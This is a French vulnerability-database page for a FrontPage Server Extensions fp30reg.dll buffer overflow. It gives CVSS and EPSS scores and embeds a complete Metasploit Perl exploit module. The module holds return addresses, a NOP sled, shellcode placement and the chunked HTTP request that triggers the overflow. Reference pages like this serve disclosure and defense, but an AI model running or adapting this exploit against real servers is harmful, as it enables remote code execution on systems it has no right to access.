CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions allows remote attackers to execute arbitrary commands via a long registration request (URL) to fp30reg.dll.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
24.73%
–
–
2022-04-03
–
–
24.73%
–
–
2023-03-12
–
–
–
2.38%
–
2023-09-17
–
–
–
2.38%
–
2024-02-18
–
–
–
2.38%
–
2024-02-25
–
–
–
3.33%
–
2024-06-02
–
–
–
3.33%
–
2024-08-25
–
–
–
3.33%
–
2024-09-29
–
–
–
3.33%
–
2024-10-13
–
–
–
3.33%
–
2024-12-22
–
–
–
1.6%
–
2025-01-19
–
–
–
1.6%
–
2025-03-18
–
–
–
–
26.32%
2025-04-15
–
–
–
–
25.17%
2025-04-15
–
–
–
–
25.17,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2001-06-20 22h00 +00:00 Auteur : NSFOCUS Security Team EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/2906/info
Due to an unchecked buffer in a subcomponent of FrontPage Server Extensions (Visual InterDev RAD Remote Deployment Support), a specially crafted request via 'fp30reg.dll' could allow a user to execute arbitrary commands in the context of IWAM_machinename on a host running IIS 5.0. A host running IIS 4.0, could allow the execution of arbitrary commands in the SYSTEM context.
package Msf::Exploit::frontpage_fp30reg_chunked;
use base "Msf::Exploit";
use strict;
my $advanced = { };
my $info =
{
'Name' => 'Frontpage fp30reg.dll Chunked Encoding',
'Version' => '$Revision: 1.19 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' => {
'Space' => 1024,
'BadChars' => "\x00+&=%\x0a\x0d\x20",
},
'Description' => qq{
This is an exploit for the chunked encoding buffer overflow
described in MS03-051 and originally reported by Brett
Moore. This particular modules works against versions of
Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
issue.
},
'Refs' => [
'http://www.osvdb.org/577',
'http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx'
],
'DefaultTarget' => 0,
'Targets' => [
['Windows 2000 SP0-SP3', 0x6c38a4d0], # from mfc42.dll
['Windows 2000 07/22/02', 0x67d44eb1], # from fp30reg.dll 07/22/2002
['Windows 2000 10/06/99', 0x67d4665d], # from fp30reg.dll 10/06/1999
],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode =$self->GetVar('EncodedPayload')->Payload;
my @targets;
my @offsets;
my $pad;
my $ret = defined($target_idx) ? ($self->Targets->[ $target_idx ]->[1]) : $self->Targets->[0]->[1];
my $pattern = Pex::PatternCreate(0xDEAD);
my $count = 0;
while (1)
{
if ($count % 3 == 0)
{
$self->PrintLine("[*] Refreshing remote process...");
my $res = $self->Check();
$count = 0;
}
substr($pattern, 128, 4, pack("V", $ret));
substr($pattern, 264, 4, pack("V", $ret));
substr($pattern, 160, 7, "\x2d\xff\xfe\xff\xff" . "\xff\xe0");
substr($pattern, 280, 512, "\x90" x 512);
substr($pattern, 792, length($shellcode), $shellcode);
my $request;
$request = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
$request .= "Host: $target_host:$target_port\r\n";
$request .= "Transfer-Encoding: chunked\r\n";
$request .= "\r\n";
$request .= "DEAD\r\n";
$request .= $pattern . "\r\n";
$request .= "0\r\n";
my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
if (! $s->Tcp($target_host, $target_port))
{
$self->FatalError("Could not connect: " . $s->GetError());
return;
}
$self->PrintLine("[*] Sending exploit request...");
$s->Send($request);
sleep(1);
$s->Close();
$count++;
}
return;
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $getreq = "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";
my $s = Msf::Socket->new( {"SSL" => $self->GetVar('SSL')} );
if (! $s)
{
$self->PrintLine("[*] Could not create the socket");
return(0);
}
if (! $s->Tcp($target_host, $target_port))
{
$self->PrintLine("[*] Could not connect: " . $s->GetError());
return(0);
}
$s->Send($getreq);
my $res = $s->Recv(-1, 10);
$s->Close();
if ($res !~ /501 Not Implemented/)
{
$self->PrintLine("[*] Frontpage component was not found");
return(0);
}
$self->PrintLine("[*] Frontpage component found");
return(1);
}
Products Mentioned
Configuraton 0
Microsoft>>Frontpage_server_extensions >> Version 2000
Microsoft>>Frontpage_server_extensions >> Version 2000 (Open CPE detail)